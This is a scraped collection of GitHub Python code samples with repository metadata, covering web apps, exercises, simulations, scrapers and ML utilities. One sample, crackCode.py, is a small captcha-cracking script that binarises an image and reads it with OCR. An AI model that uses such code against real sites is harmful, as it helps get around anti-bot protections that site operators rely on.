+{"seq_id":"8335663780","text":"\"\"\"__author__ = 叶小永\"\"\"\nfrom django.conf import settings\nfrom django.core.mail import send_mail\n\nfrom celery_tasks.main import app\n\n\n@app.task(name='send_verity_email')\ndef send_verity_email(to_email, verity_url):\n subject = '美多商城邮箱验证'\n html_message = '

尊敬的用户,您好!

'\\\n '

感谢您使用美多商城。

'\\\n '

您的邮箱为:%s。请点击此链接激活您的邮箱:

'\\\n '

%s

' % (to_email, verity_url, verity_url)\n # 发送验证邮件\n send_mail(subject, \"\", settings.EMAIL_FROM, [to_email], html_message=html_message)\n\n","repo_name":"yeexy/HiBuy","sub_path":"celery_tasks/email/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"25440397397","text":"fname=input('Enter the file name:')\r\ntry:\r\n fh=open(fname)\r\nexcept:\r\n print(\"File no found\",fname)\r\n quit()\r\ncount=0\r\nfor line in fh:\r\n line=line.rstrip()\r\n if not line.startswith(\"From \"):\r\n continue\r\n stuff=line.split()\r\n count=count+1\r\n print(stuff[1])\r\n","repo_name":"gagann17/daily-parctice","sub_path":"ass8.2.py","file_name":"ass8.2.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"6023945024","text":"\"\"\"\nAbra um arquivo texto, calcule e escreva o numero de caracteres, o numero de linhas e\no numero de palavras neste arquivo. Escreva também quantas vezes cada letra ocorre no\narquivo (ignorando letras com acento). Obs.: palavras sao separadas por um ou mais\ncaracteres espaco, tabulacao ou nova linha.\n\"\"\"\n\nnames = open('files/names.txt').read()\n\nline = 0\nfor i in names.split('\\n'):\n if i != '':\n line = line + 1\n\ncharacter = 0\nfor j in names:\n if j != '\\n':\n character = character + 1\n\nword = 0\nfor p in names.split('\\n'):\n if p != '':\n word = word + 1\n\nprint(f'O arquivo tem {character} caracteres, {line} linhas e {word} palavras')\n","repo_name":"eduardomingoranca/geek-university-projects-python","sub_path":"section_thirteen/exercises-section-thirteen/exercise12.py","file_name":"exercise12.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"9914965633","text":"import sys\nsys.stdin = open(\"C:/Users/dhxog/Desktop/파이썬 알고리즘 문제풀이(코딩테스트 대비)/섹션 3/8. 곳감/in1.txt\",\"rt\")\nn = int(input())\na = [list(map(int, input().split())) for _ in range(n)]\nm = int(input())\nr = [list(map(int, input().split())) for _ in range(m)]\n\ndef rotation(x = list(), s=1, w=1):\n if s == 1:\n forward = x[:len(x) - w]\n backward = x[len(x)-w:]\n return backward + forward\n if s == 0:\n forward = x[:w]\n backward = x[w:]\n return backward + forward\n\n\nfor i in range(m):\n x = a[r[i][0]][:]\n s = r[i][1]\n w = r[i][2]\n\n a[r[i][0]][:] = rotation(x, s, w)\na \nres = 0\ns = 0\ne = n-1\nfor i in range(n):\n for j in range(s, e+1):\n res += a[i][j]\n if i < n//2:\n s += 1\n e -= 1\n else:\n s -= 1\n e += 1\n\nprint(res)\n","repo_name":"dhxoghks95/Python_Algorithm","sub_path":"section_3/Q8/8_oth.py","file_name":"8_oth.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"25497549046","text":"import espressomd\nimport espressomd.interactions\nimport espressomd.polymer\nimport espressomd.io.writer.vtf # pylint: disable=import-error\n\nespressomd.assert_features([\"WCA\"])\n\nimport numpy as np\n\n# System parameters\n#############################################################\n\nsystem = espressomd.System(box_l=[100, 100, 100])\nnp.random.seed(seed=42)\n\nsystem.time_step = 0.01\nsystem.cell_system.skin = 0.4\nsystem.cell_system.set_n_square(use_verlet_lists=False)\noutfile = open('polymer.vtf', 'w')\n\nsystem.non_bonded_inter[0, 0].wca.set_params(epsilon=1, sigma=1)\n\nfene = espressomd.interactions.FeneBond(k=10, d_r_max=2)\nsystem.bonded_inter.add(fene)\n\n\npositions = espressomd.polymer.linear_polymer_positions(\n n_polymers=1, beads_per_chain=50, bond_length=1.0, seed=3210)\nprevious_part = None\nfor pos in positions[0]:\n part = system.part.add(pos=pos)\n if previous_part:\n part.add_bond((fene, previous_part))\n previous_part = part\n\nespressomd.io.writer.vtf.writevsf(system, outfile)\n\n\n#############################################################\n# Warmup #\n#############################################################\n\n# minimize energy using min_dist as the convergence criterion\nsystem.integrator.set_steepest_descent(f_max=0, gamma=1e-3,\n max_displacement=0.01)\nwhile system.analysis.min_dist() < 0.95:\n print(f\"minimization: {system.analysis.energy()['total']:+.2e}\")\n system.integrator.run(20)\n\nprint(f\"minimization: {system.analysis.energy()['total']:+.2e}\")\nprint()\nsystem.integrator.set_vv()\n\n# activate thermostat\nsystem.thermostat.set_langevin(kT=1.0, gamma=1.0, seed=42)\n\n\n#############################################################\n# Integration #\n#############################################################\n\nprint(\"simulating...\")\nt_steps = 1000\nfor t in range(t_steps):\n print(f\"step {t + 1} of {t_steps}\", end='\\r', flush=True)\n system.integrator.run(10)\n espressomd.io.writer.vtf.writevcf(system, outfile)\noutfile.close()\nprint()\n","repo_name":"espressomd/espresso","sub_path":"samples/minimal-polymer.py","file_name":"minimal-polymer.py","file_ext":"py","file_size_in_byte":2124,"program_lang":"python","lang":"en","doc_type":"code","stars":203,"dataset":"github-code","pt":"79"} +{"seq_id":"16818549283","text":"import tkinter as tk\nfrom tkinter import ttk\nimport asyncio\n\n\nclass App:\n async def exec(self):\n self.window = Window(asyncio.get_event_loop())\n await self.window.show()\n\n\nclass Window(tk.Tk):\n def __init__(self, loop):\n self.loop = loop\n self.root = tk.Tk()\n self.animation = \"░▒▒▒▒▒\"\n \n self.label = tk.Label(text=\"\")\n self.label.grid(row=0, columnspan=2, padx=(8, 8), pady=(16, 0))\n \n self.progressbar = ttk.Progressbar(length=280)\n self.progressbar.grid(row=1, columnspan=2, padx=(8, 8), pady=(16, 0))\n \n button_block = tk.Button(text=\"Calculate Sync\", width=10, command=self.calculate_sync)\n button_block.grid(row=2, column=0, sticky=tk.W, padx=8, pady=8)\n \n button_non_block = tk.Button(text=\"Calculate Async\", width=10, command=lambda: self.loop.create_task(self.calculate_async()))\n button_non_block.grid(row=2, column=1, sticky=tk.W, padx=8, pady=8)\n\n async def show(self):\n while True:\n self.label[\"text\"] = self.animation\n self.animation = self.animation[1:] + self.animation[0]\n self.root.update()\n await asyncio.sleep(.1)\n\n def calculate_sync(self):\n max = 3000000\n for i in range(1, max):\n self.progressbar[\"value\"] = i / max * 100\n\n async def calculate_async(self):\n max = 3000000\n for i in range(1, max):\n self.progressbar[\"value\"] = i / max * 100\n if i % 1000 == 0:\n await asyncio.sleep(0)\n\nasyncio.run(App().exec())","repo_name":"h0uter/situational-graph","sub_path":"experiments/async_tk.py","file_name":"async_tk.py","file_ext":"py","file_size_in_byte":1606,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"79"} +{"seq_id":"74720983295","text":"#!/usr/bin/python3\n\"\"\"\nUsing what you did in the task #0, extend your Python script to export data\nin the CSV format.\nRequirements:\n - Records all tasks that are owned by this employee\n - Format must be: \"USER_ID\",\"USERNAME\",\"TASK_COMPLETED_STATUS\",\n \"TASK_TITLE\"\n - File name must be: USER_ID.csv\n\"\"\"\nimport csv\nimport requests\nimport sys\n\nif __name__ == \"__main__\":\n uid = sys.argv[1]\n url = \"https://jsonplaceholder.typicode.com\"\n\n user_url = f\"{url}/users/{uid}\"\n user_resp = requests.get(user_url)\n user_json = user_resp.json()\n todo_url = f\"{url}/todos?userId={uid}\"\n todo_resp = requests.get(todo_url)\n todo_json = todo_resp.json()\n\n filename = f\"{uid}.csv\"\n with open(filename, \"w\") as f:\n csv_writer = csv.writer(f, quoting=csv.QUOTE_ALL)\n for todo in todo_json:\n\n USER_ID = f\"{uid}\"\n USERNAME = f\"{user_json.get('username')}\"\n TASK_COMPLETED_STATUS = f\"{todo.get('completed')}\"\n TASK_TITLE = f\"{todo.get('title')}\"\n\n csv_writer.writerow([USER_ID, USERNAME, TASK_COMPLETED_STATUS,\n TASK_TITLE])\n","repo_name":"FREDRICKKYEKI/alx-system_engineering-devops","sub_path":"0x15-api/1-export_to_CSV.py","file_name":"1-export_to_CSV.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"71981306815","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n############################################\n#\n# PyGdalSAR: An InSAR post-processing package \n# written in Python-Gdal\n#\n############################################\n# Author : Mathieu Volat \n############################################\n\n\n\"\"\"\\\nplot_geots.py\n-------------\nPlot annimated time series maps \n\nUsage: plot_annimate_ts.py --cube= [--vmin=] [--vmax=] \\\n [--wrap=] [--cpt=] [--crop=] [--output=] \n\nOptions:\n-h --help Show this screen.\n--cube time series displacement cube \n--vmax VALUE Max colorscale \n--vmin VALUE Min colorscale\n--wrap VALUE Wrapped phase between value [default: no]\n--cpt Indicate colorscale\n--crop VALUE Crop option [default: 0,nlign,0,ncol]\n--output Optinional saving as mp4\n\"\"\"\n\nimport sys\nimport numpy as np\nfrom osgeo import gdal\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport matplotlib.cm as cm\nimport os\n\nimport docopt\narguments = docopt.docopt(__doc__)\nif arguments[\"--cpt\"] is None:\n cmap=cm.rainbow\nelse:\n cmap=arguments[\"--cpt\"]\n\n# Open input dataset\nds = gdal.Open(arguments[\"--cube\"])\nif not ds:\n exit(1)\nmd = ds.GetMetadata()\nprint(md)\n\n# Last band (should) give us a min/max displacement\nband = ds.GetRasterBand(ds.RasterCount)\nm = band.ReadAsArray(0, 0, ds.RasterXSize, ds.RasterYSize)\nif arguments[\"--crop\"] == None:\n crop = [0,ds.RasterYSize,0,ds.RasterXSize]\nelse:\n crop = map(float,arguments[\"--crop\"].replace(',',' ').split())\nibeg,iend,jbeg,jend = int(crop[0]),int(crop[1]),int(crop[2]),int(crop[3])\nvmax = np.nanpercentile(m[ibeg:iend,jbeg:jend], 95)\nvmin = np.nanpercentile(m[ibeg:iend,jbeg:jend], 5)\n\nif arguments[\"--vmax\"] is not None:\n vmax = float(arguments[\"--vmax\"])\n\nif arguments[\"--vmin\"] is not None:\n vmin = float(arguments[\"--vmin\"])\n \nif arguments[\"--wrap\"] is not None:\n vmax=float(arguments[\"--wrap\"])\n vmin=-vmax\n\n# Create figure\nfig = plt.figure(sys.argv[1])\n\n# Figure update function, will be used at init too\ndef f(i):\n global ds\n i = i % ds.RasterCount + 1\n b = ds.GetRasterBand(i)\n plt.title(md[\"Band_%d\"%i])\n if arguments[\"--wrap\"] is not None:\n los = np.mod(b.ReadAsArray()[ibeg:iend,jbeg:jend]+float(arguments[\"--wrap\"]),2*float(arguments[\"--wrap\"]))-float(arguments[\"--wrap\"])\n else:\n los = b.ReadAsArray()[ibeg:iend,jbeg:jend]\n return los\n\n# Initialize\ni = 0\nim = plt.imshow(f(i), cmap=cmap, vmin=vmin, vmax=vmax, animated=True)\n\n# Animation update function\ndef updatefig(*args):\n global i\n i = i+1\n im.set_array(f(i))\n return im,\n\n# Animate\nani = animation.FuncAnimation(fig, updatefig, interval=200, blit=True)\n\nif arguments[\"--output\"] is not None:\n base = os.path.splitext(arguments[\"--output\"])[0]\n #Writer = animation.writers['ffmpeg']\n #writer = Writer('fps=15',metadata=dict('Me'),bitrate=1800)\n ani.save(base+'.mp4')\n\n# Display\nplt.colorbar()\nplt.show()\n\n","repo_name":"simondaout/PyGdalSAR","sub_path":"TimeSeries/plot_animate_ts.py","file_name":"plot_animate_ts.py","file_ext":"py","file_size_in_byte":3099,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"79"} +{"seq_id":"70020442175","text":"from selenium import webdriver\nimport pandas as pd\nfrom bs4 import BeautifulSoup\n\n\nclass Movie(object):\n\n url = 'https://movie.naver.com/movie/sdb/rank/rmovie.nhn'\n classes = ''\n driver_path = 'C:/Program Files/Google/Chrome/chromedriver'\n # driver = 'C://Program Files//Google//Chrome//chromedriver' 이렇게 표기할수도 있다.\n\n movie_ranking = []\n movie_dict = {}\n df = None\n\n def scrap(self):\n driver = webdriver.Chrome(self.driver_path)\n driver.get(self.url)\n soup = BeautifulSoup(driver.page_source, 'html.parser') # 여기서는 'lxml' 사용불가\n all_div = soup.find_all(\"div\", {\"class\":self.classes})\n self.movie_ranking = [{i.find(\"a\").text} for i in all_div]\n print(self.movie_ranking)\n driver.close()\n\n def get_dict(self):\n for i in range(0, len(self.movie_ranking)):\n self.movie_dict[i] = self.movie_ranking\n print(self.movie_dict)\n\n def get_dataFrame(self):\n self.df = pd.DataFrame(self.movie_dict)\n print(self.df)\n\n def get_csv(self):\n path = './data/naverMusic.csv'\n self.df.to_csv(path, sep=',', na_rep='Nan')\n\n\nif __name__ == '__main__':\n movie = Movie()\n movie.classes = input('클래스를 입력하세요') # tit3\n movie.scrap()\n movie.get_dict()\n movie.get_dataFrame()\n movie.get_csv()\n","repo_name":"yunnyisgood/django-monaco","sub_path":"my_django/webscrap/naver_movie.py","file_name":"naver_movie.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"16663852832","text":"def f(n):\n sum = 0\n for i in range(1,n):\n if n % i == 0:\n sum += i\n\n if sum == n:\n cnt = 1\n else:\n cnt = 0\n return cnt\n\n\nx = int(input())\nb = 0\nfor i in range(2, x + 1):\n if f(i) == 1:\n print(i)\n b += 1\nif b == 0:\n print(\"На данном промежутке совершенных чисел нет.\")\n","repo_name":"incorrectrrrozya/kursovaya","sub_path":"kursovaya1/venv/3.2б.py","file_name":"3.2б.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"20389327818","text":"#! /user/bin/env python\n# encoding=utf-8\n#__author__ ='zx'\n#__time__ ='2017-10-1014:06'\n'''\n破解验证码\n'''\nfrom PIL import Image\nimport pytesseract\ndef recognize_captcha(imgpath):\n im = Image.open(imgpath).convert(\"L\")\n # 1. threshold the image\n threshold = 140\n table = []\n for i in range(256):\n if i < threshold:\n table.append(0)\n else:\n table.append(1)\n\n out = im.point(table, '1')\n # out.show()\n # 2. recognize with tesseract\n num = pytesseract.image_to_string(out)\n return num\n\nif __name__ == '__main__':\n res = recognize_captcha('securityCode.jpg')\n strs = res.split(\"\\n\")\n if len(strs) >=1:\n print (strs[0])\n","repo_name":"qiqiyangyang/PerformanceTest","sub_path":"crackCode.py","file_name":"crackCode.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"21545729324","text":"from flask_sqlalchemy import SQLAlchemy\n\ndb = SQLAlchemy()\n\nclass Product(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(100), nullable=False)\n price = db.Column(db.Float, nullable=False)\n image = db.Column(db.String(255), nullable=False)\n quantity = db.Column(db.Integer, nullable=False) \n\ndef init_db(app):\n with app.app_context():\n db.create_all()\n if not Product.query.first():\n products = [\n (\"Bebidas\", 12, \"Images/bebidas.jpeg\", 10),\n (\"Duraznos\", 20, \"Images/duraznos.webp\", 15),\n (\"Frutas\", 35, \"Images/frutas.jpeg\", 20),\n (\"Frutas Secas\", 22, \"Images/frutos secos.jpeg\", 5),\n (\"Arándanos\", 27, \"Images/grapes.jpeg\", 30),\n (\"Limones\", 18, \"Images/limonez.webp\", 50),\n (\"Verduras\", 19, \"Images/verduras.jpeg\", 40),\n (\"Medicamentos\", 15, \"Images/Medicamentos.webp\", 25),\n (\"Entretenimiento\", 38, \"Images/mario-luigi-yoschi-figures-163036.jpeg\", 10)\n ]\n for product in products:\n db.session.add(Product(name=product[0], price=product[1], image=product[2], quantity=product[3]))\n db.session.commit()\n print(\"Database created and populated with products.\")\n\ndef get_all_products():\n return Product.query.all()\n\n\ndef get_products_by_ids(ids):\n return Product.query.filter(Product.id.in_(ids)).all()\n","repo_name":"AntJyS/front-end-equipo-16","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"7728146109","text":"class Solution:\n def convert(self, s: str, numRows: int) -> str:\n # (numRows - 1) * 2 elements to travel for one element to next element in same row for first row and bottom row\n if numRows == 1:\n return s\n \n res = \"\"\n increment = 2 * (numRows - 1)\n \n for r in range(numRows):\n for i in range(r, len(s), increment):\n # Row at first and last\n res += s[i]\n # Rows in between first and last row\n if (r > 0 and r < numRows - 1 and i + increment - 2 * r < len(s)):\n res += s[i + increment - 2 * r]\n return res","repo_name":"ameyxd/leetcode-interview-practice","sub_path":"6-zigzag-conversion/6-zigzag-conversion.py","file_name":"6-zigzag-conversion.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"8698001401","text":"from openquake.baselib import sap\nfrom openquake.risklib.countries import code2country\n\n# example: utils/addcol.py country=VEN Exposure_Res_Venezuela.csv\n\n\ndef addcol(namevalue, fnames):\n name, value = namevalue.split('=')\n if name == 'country':\n assert value in code2country, value\n for fname in fnames:\n header, *lines = open(fname).readlines()\n out = [header.rstrip() + ',' + name]\n for line in lines:\n out.append(line.rstrip() + ',' + value)\n with open(fname, 'w') as f:\n for line in out:\n f.write(line + '\\n')\n print('Added %s to %s' % (namevalue, fname))\n\n\naddcol.namevalue = 'string of the form column_name=column_value'\naddcol.fnames = dict(help='CSV files to update', nargs='+')\n\nif __name__ == '__main__':\n sap.run(addcol)\n","repo_name":"gem/oq-engine","sub_path":"utils/addcol.py","file_name":"addcol.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","stars":338,"dataset":"github-code","pt":"79"} +{"seq_id":"20150480192","text":"import os\n\nimport boto3\nfrom six.moves import urllib\n\nfrom mlflow.entities import FileInfo\nfrom mlflow.store.artifact_repo import ArtifactRepository\nfrom mlflow.utils.file_utils import build_path, get_relative_path, TempDir\n\n\nclass S3ArtifactRepository(ArtifactRepository):\n \"\"\"Stores artifacts on Amazon S3.\"\"\"\n\n @staticmethod\n def parse_s3_uri(uri):\n \"\"\"Parse an S3 URI, returning (bucket, path)\"\"\"\n parsed = urllib.parse.urlparse(uri)\n if parsed.scheme != \"s3\":\n raise Exception(\"Not an S3 URI: %s\" % uri)\n path = parsed.path\n if path.startswith('/'):\n path = path[1:]\n return parsed.netloc, path\n\n def log_artifact(self, local_file, artifact_path=None):\n (bucket, dest_path) = self.parse_s3_uri(self.artifact_uri)\n if artifact_path:\n dest_path = build_path(dest_path, artifact_path)\n dest_path = build_path(dest_path, os.path.basename(local_file))\n\n boto3.client('s3').upload_file(local_file, bucket, dest_path)\n\n def log_artifacts(self, local_dir, artifact_path=None):\n (bucket, dest_path) = self.parse_s3_uri(self.artifact_uri)\n if artifact_path:\n dest_path = build_path(dest_path, artifact_path)\n s3 = boto3.client('s3')\n local_dir = os.path.abspath(local_dir)\n for (root, _, filenames) in os.walk(local_dir):\n upload_path = dest_path\n if root != local_dir:\n rel_path = get_relative_path(local_dir, root)\n upload_path = build_path(dest_path, rel_path)\n for f in filenames:\n s3.upload_file(build_path(root, f), bucket, build_path(upload_path, f))\n\n def list_artifacts(self, path=None):\n (bucket, artifact_path) = self.parse_s3_uri(self.artifact_uri)\n dest_path = artifact_path\n if path:\n dest_path = build_path(dest_path, path)\n infos = []\n prefix = dest_path + \"/\"\n paginator = boto3.client('s3').get_paginator(\"list_objects_v2\")\n results = paginator.paginate(Bucket=bucket, Prefix=prefix, Delimiter='/')\n for result in results:\n # Subdirectories will be listed as \"common prefixes\" due to the way we made the request\n for obj in result.get(\"CommonPrefixes\", []):\n subdir = obj.get(\"Prefix\")[len(artifact_path)+1:]\n if subdir.endswith(\"/\"):\n subdir = subdir[:-1]\n infos.append(FileInfo(subdir, True, None))\n # Objects listed directly will be files\n for obj in result.get('Contents', []):\n name = obj.get(\"Key\")[len(artifact_path)+1:]\n size = int(obj.get('Size'))\n infos.append(FileInfo(name, False, size))\n return sorted(infos, key=lambda f: f.path)\n\n def download_artifacts(self, artifact_path):\n with TempDir(remove_on_exit=False) as tmp:\n return self._download_artifacts_into(artifact_path, tmp.path())\n\n def _download_artifacts_into(self, artifact_path, dest_dir):\n \"\"\"Private version of download_artifacts that takes a destination directory.\"\"\"\n basename = os.path.basename(artifact_path)\n local_path = build_path(dest_dir, basename)\n listing = self.list_artifacts(artifact_path)\n if len(listing) > 0:\n # Artifact_path is a directory, so make a directory for it and download everything\n os.mkdir(local_path)\n for file_info in listing:\n self._download_artifacts_into(file_info.path, local_path)\n else:\n (bucket, s3_path) = self.parse_s3_uri(self.artifact_uri)\n s3_path = build_path(s3_path, artifact_path)\n boto3.client('s3').download_file(bucket, s3_path, local_path)\n return local_path\n","repo_name":"rstudio/mlflow-original","sub_path":"mlflow/store/s3_artifact_repo.py","file_name":"s3_artifact_repo.py","file_ext":"py","file_size_in_byte":3825,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"79"} +{"seq_id":"44688781245","text":"# Url: https://leetcode.com/problems/add-binary/\n# Related Topics:\n# String\n\n# Example:\n# Input: a = \"1010\", b = \"1011\"\n# Output: \"10101\"\n\n\nclass Solution:\n def addBinary(self, a, b):\n \"\"\"\n :type a: str\n :type b: str\n :rtype: str\n \"\"\"\n len_a, len_b = len(a), len(b)\n a, b = a[::-1], b[::-1]\n ans = \"\"\n i, j, inc = 0, 0, 0\n while i < len_a or j < len_b:\n i_a = int(a[i]) if i < len_a else 0\n j_b = int(b[j]) if j < len_b else 0\n cur = i_a + j_b + inc\n inc, cur = cur // 2, cur % 2\n ans += str(cur)\n i += 1\n j += 1\n if inc:\n ans += str(inc)\n return ans[::-1]\n ","repo_name":"EVASHINJI/LeetCode","sub_path":"Daily/67 Add Binary.py","file_name":"67 Add Binary.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"13104837571","text":"#!/usr/bin/env python\n#\n# Warmup Elasticsearch tracks index.\n#\n# Usage: cut -f2 -d'|' datas/tracks.* | python warmup.py\n#\n# Example (search for 1k top popular tracks):\n# sort -rnk3 -t'|' datas/tracks.* | head -n 1000 | cut -f2 -d'|' | sort | uniq | python bin/warmup.py\n#\n\nimport re\nimport fileinput\n\nfrom elasticsearch import Elasticsearch\n\nes = Elasticsearch()\n\nfor keywords in fileinput.input():\n keywords = keywords.strip(' \\t\\n\\r')\n keywords = re.sub('[^A-Za-z0-9 ]+', '', keywords).lower()\n\n print(keywords)\n\n pos = 1\n for char in keywords:\n print(keywords[:pos])\n pos += 1\n\n query = {\n \"query\": {\n \"match\": {\n \"name_autocomplete\": keywords[:pos]\n }\n }\n }\n\n print(es.search(index=\"tracks\", body=query))\n","repo_name":"adrienschuler-zz/deez","sub_path":"bin/warmup.py","file_name":"warmup.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"25751902000","text":"import collections, math, bisect, heapq, random, functools, itertools, copy, typing\nimport platform; LOCAL = (platform.uname().node == 'AMO')\n\n\nimport sys; input = lambda: sys.stdin.readline().rstrip(\"\\r\\n\")\ninp = lambda f=int: list(map(f, input().split()))\n\ndef make_arr(*args):\n def func(x):\n if len(args) == 1: return [x() for _ in range(args[0])]\n return [make_arr(*args[1:])(x) for _ in range(args[0])]\n return func\n\ndef debug(*args):\n if LOCAL:\n print('\\033[92m', end='')\n printf(*args)\n print('\\033[0m', end='')\n\ndef printf(*args):\n if LOCAL:\n print('>>>: ', end='')\n for arg in args:\n if isinstance(arg, typing.Iterable) and \\\n not isinstance(arg, str) and \\\n not isinstance(arg, dict):\n print(' '.join(map(str, arg)), end=' ')\n else:\n print(arg, end=' ')\n print()\n\n# avaliable on Google, AtCoder\n# sys.setrecursionlimit(10**6)\n# import numpy as np\n# import scipy\n\n# d4 = [(1,0),(0,1),(-1,0),(0,-1)]\n# d8 = [(1,0),(1,1),(0,1),(-1,1),(-1,0),(-1,-1),(0,-1),(1,-1)]\n# d6 = [(2,0),(1,1),(-1,1),(-2,0),(-1,-1),(1,-1)] # hexagonal layout\nclass Encodict:\n def __init__(self, func=lambda : 0):\n self.RANDOM = random.randint(0, 1<<32)\n self.default = func\n self.dict = {}\n \n def __getitem__(self, key):\n k = self.RANDOM ^ key\n if k not in self.dict:\n self.dict[k] = self.default()\n return self.dict[k]\n \n def __setitem__(self, key, item):\n k = self.RANDOM ^ key\n self.dict[k] = item\n\n def keys(self):\n return [self.RANDOM ^ i for i in self.dict]\n \n def items(self):\n return [(self.RANDOM ^ i, self.dict[i]) for i in self.dict]\n \n def sorted(self, by_value=False, reverse=False):\n if by_value:\n self.dict = dict(sorted(self.dict.items(), \\\n key=lambda x:x[1], reverse=reverse))\n else:\n self.dict = dict(sorted(self.dict.items(), \\\n key=lambda x:self.RANDOM^x[0], reverse=reverse))\n\ndef sixface(x, y, z, a, b, c, i):\n ret = [\n (x, y, z, a, b, z, i),\n (x, y, z, a, y, c, i),\n (x, y, z, x, b, c, i),\n (x, y, c, a, b, c, i),\n (x, b, z, a, b, c, i),\n (a, y, z, a, b, c, i)\n ]\n return ret\n\ndef solve(cas):\n n, = inp()\n x = Encodict(list)\n y = Encodict(list)\n z = Encodict(list)\n all_cubes = []\n d = {}\n \n for i in range(n):\n coords = inp()\n all_cubes.append(coords)\n for f in sixface(*coords, i):\n if f[0] == f[3]:\n x[f[0]].append(f)\n if f[1] == f[4]:\n y[f[1]].append(f)\n if f[2] == f[5]:\n z[f[2]].append(f)\n \n def check(x0, y0, a0, b0, x1, y1, a1, b1):\n if x1 >= x0 and y1 >= y0 and x1 < a0 and y1 < b0:\n return True\n if a1 > x0 and b1 > y0 and a1 <= a0 and b1 <= b0:\n return True\n if x0 >= x1 and y0 >= y1 and x0 < a1 and y0 < b1:\n return True \n if a0 > x1 and b0 > y1 and a0 <= a1 and b0 <= b1:\n return True\n return False\n \n \n for xx in x.keys():\n for i in range(1, len(x[xx])):\n for j in range(i):\n if check(x[xx][i][1], x[xx][i][2], x[xx][i][4],x[xx][i][5],x[xx][j][1], x[xx][j][2], x[xx][j][4],x[xx][j][5]):\n debug(x[xx][i], x[xx][j])\n d[x[xx][i]] = d.get(x[xx][i], 0) + 1\n d[x[xx][j]] = d.get(x[xx][j], 0) + 1\n for yy in y.keys():\n for i in range(1, len(y[yy])):\n for j in range(i):\n if check(y[yy][i][0], y[yy][i][2], y[yy][i][3],y[yy][i][5],y[yy][j][0], y[yy][j][2], y[yy][j][3],y[yy][j][5]):\n debug(y[yy][i], y[yy][j])\n d[y[yy][i]] = d.get(y[yy][i], 0) + 1\n d[y[yy][j]] = d.get(y[yy][j], 0) + 1\n\n for zz in z.keys():\n for i in range(1, len(z[zz])):\n for j in range(i):\n if check(z[zz][i][0], z[zz][i][1], z[zz][i][3],z[zz][i][4],z[zz][j][0], z[zz][j][1], z[zz][j][3],z[zz][j][4]):\n debug(z[zz][i], z[zz][j])\n d[z[zz][i]] = d.get(z[zz][i], 0) + 1\n d[z[zz][j]] = d.get(z[zz][j], 0) + 1\n debug(d)\n for i, coords in enumerate(all_cubes):\n faces = sixface(*coords, i)\n tot = 0\n for f in faces:\n tot += d.get(f, 0)\n print(tot)\n\ncas = 1\nfor _ in range(cas):\n solve(_)\n\n","repo_name":"amomorning/online-challenges","sub_path":"atcoder/abc312/e_tle.py","file_name":"e_tle.py","file_ext":"py","file_size_in_byte":4571,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"23499314992","text":"import csv\r\nimport random\r\n\r\n\r\ndef train_test(dataset, test_state):\r\n test_ratio = 100 * test_state\r\n train_ratio = 100 - test_ratio\r\n training_set, testing_set = [], []\r\n # dataset=[]\r\n c = 0\r\n ''' with open('tree/xss.csv') as tsv:\r\n for line in csv.reader(tsv, delimiter=\",\"): \r\n data.append(list(line))'''\r\n # ........Removing list with same values......\r\n ''' for d in data:\r\n if d not in dataset:\r\n dataset.append(d)'''\r\n len_train = (len(dataset) * train_ratio) / 100\r\n len_test = len(dataset) - len_train\r\n # random.shuffle(data)\r\n # .....Splitting the dataset.......\r\n for i in range(int(len_train)):\r\n training_set.append(dataset[i])\r\n c += 1\r\n print(len_train, c)\r\n for i in range(int(len_train), len(dataset)):\r\n # if dataset[i] not in training_set:\r\n testing_set.append(dataset[i])\r\n\r\n return training_set, testing_set\r\n\r\n\r\ndata = []\r\nwith open('xssed.csv') as tsv:\r\n for line in csv.reader(tsv, delimiter=','):\r\n data.append(list(line))\r\ntraining_data, testing_data = train_test(data, 0.2)\r\nprint(len(training_data), len(testing_data))\r\n","repo_name":"NaveenBJacob/Website-risk-prediction-and-prevention","sub_path":"data_split.py","file_name":"data_split.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"10017115690","text":"\n\nimport logging\nfrom datetime import datetime\nfrom datetime import timedelta\n\nimport h5netcdf\nimport numpy as np\nimport xarray as xr\nimport dask.array as da\n\nfrom pyresample.utils import 